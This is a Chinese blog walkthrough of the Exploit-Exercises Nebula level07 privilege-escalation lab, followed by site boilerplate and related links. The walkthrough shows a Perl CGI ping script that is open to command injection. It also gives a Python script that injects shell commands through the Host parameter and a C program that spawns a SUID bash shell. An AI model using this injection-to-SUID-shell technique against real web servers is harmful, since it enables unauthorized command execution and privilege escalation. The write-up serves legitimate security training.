ExploitExercises_Nebula_Level07

最新推荐文章于 2019-10-21 09:01:11 发布
最新推荐文章于 2019-10-21 09:01:11 发布
阅读量1k 收藏
点赞数
分类专栏: ExploitExercise
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hurricane_0x01/article/details/53896574
版权

题目源码为一段perl脚本:

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

第12行@output = `ping -c 3 $host 2>&1`;对参数host未做控制,可输入任意命令执行。

在/home/level07目录下创建cmd.py文件:

#!/usr/bin/python
import urllib
import sys

host = "localhost -c3;"
cmd = sys.argv[1]
payload = host + cmd
final = urllib.urlencode({'Host':payload})
f = urllib.urlopen("http://localhost:7007/index.cgi?%s", final)
print f.read()


在/tmp目录下创建level07.c文件: 

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/bin/bash");
}

输入参数,运行cmd.py文件: 

./cmd.py "gcc -o /tmp/level07 /tmp/level07.c;chmod u+s,a+x /tmp/level07;cp /tmp/level07 /home/flag07/;chmod u+s /home/flag07/level07"

此时在/home/flag07目录下创建level07文件,并且设置了SUID属性,运行,提权成功。

小黑话不多
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ExploitExercises_Nebula_Level01
小黑话不多
12-26 1377
题目源码如下: #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);
ExploitExercises_Nebula_Level14
小黑话不多
12-30 1023
/home/flag14/flag14是一个加密程序,输入加-e参数,该程序将对输入数据加密后输出到终端: level14@nebula:~$ /home/flag14/flag14 -e 123456 13579; 逆向加密算法: v12 = *MK_FP(__GS__, 20); v8 = 0; if ( argc <= 1 ) goto LABEL_17;
【英语学习】【Level 07】U06 First Time L4 Lost in Shanghai
一凡stkeke
10-21 242
文章目录Word Preparationmaze: 迷宫totally: 完全地lost one's way: 迷路make one's way to: 去某地hail a taxi: 打车wander around: 徘徊,闲逛Grammar强化词 (intensifier) Word Preparation maze: 迷宫 a complicated system of paths or p...
Nebula level07
无心插柳
05-10 7741
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the p
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
i春秋 - Exploit-Exercises: Nebula - level00
无节操
02-25 2410
AboutThis level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking dire
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1508
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
digital_nebula
09-02
digital_nebula
golden_nebula
09-02
golden_nebula
Pulsar_wind_nebula_Spectral_analysis
02-09
脉冲星风 nebula(Pulsar Wind Nebula,PWN)是高能天体物理领域的一个重要研究对象,由旋转的中子星——脉冲星的极高速度粒子流与周围环境相互作用形成。在“Pulsar_wind_nebula_Spectral_analysis”这个主题下,...
抽象精品ppt模板golden_nebula234
09-02
抽象精品ppt模板golden_nebula234
精品ppt模板PPT素材digital_nebula018
09-02
精品ppt模板PPT素材digital_nebula018
i春秋 - Exploit-Exercises: Nebula - level01
无节操
02-25 2536
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?To do this level, log in as the level01 account with the password level01. Files for th
Exploit-ExerciseNebula实践(一)
Yale的博客
01-13 950
获取00关卡的flag。 题目提示需要查找以”flag00”账户运行的设置了SUID的程序,并提示我们可以从跟目录开始查找 找到了了之后执行这个程序,我们这个用户“level00”就或者“flag00”的权限,也就可以getflag了 那么怎么找到符合要求的程序呢? 首先切换到根目录 由于我们目前的登录的是level00,在搜索没有权限进入的目录时会出错,所以为了避免干扰需要将错误信息输入到/d...
Exploit-exercises
MillionSky的专栏
04-09 2072
1 概述Exploit-Exercise是一个Linux平台下漏洞挖掘、分析的练习平台。网址为:https://exploit-exercises.com官方提供了个很多虚拟机、文档、挑战题目,用于学习各种计算机安全问题,如权限提升、漏洞分析、Exploit开发、调试、逆向工程和通用的网络安全问题。 目前有几个板块:Nebula、Protostar、Fusion、Main Sequence、Clo...
i春秋 - Exploit-Exercises: Nebula - level06
无节操
02-25 1173
AboutThe flag06 account credentials came from a legacy unix system. Nebula思路题目提示“legacy unix system”,即可破用户密码。cat /etc/passwd | grep flag06得到 sudo apt install john vim flag06passflag06:ueqwOCnSGdsuM:9
高性能流媒体服务器-nebula之数据结构(7)--环形无锁队列
成怡的博客
09-02 594
STRingQueue是一个单线程访问的环状队列;SPSCRingQueue是一个wait-free,单生产者--单消费者的无锁环形队列,当入队的元素超过限定的元素个数时,返回false,效率非常高.使用方法:peek--获取队列头元素,peekDone--头元素出队,该队列的使用场景:每个client session的发送队列,如果发送队列溢出,则表示用户网速太慢,服务器应主动断开用户的连接。
i春秋 - Exploit-Exercises: Nebula - level04
无节操
02-25 1190
AboutThis level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)Source#include <stdlib.h> #include <unistd.h> #include <string.h> #incl
table_name="ods_nebula_tb_customer" table_level_1="${table_name%%_*}"
最新发布
07-15
根据你提供的代码,变量 `table_name` 的值是 "ods_nebula_tb_customer",而变量 `table_level_1` 则是通过截取 `table_name` 中第一个下划线之前的部分来得到的。 具体来说,`${table_name%%_*}` 是一种字符串替换...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值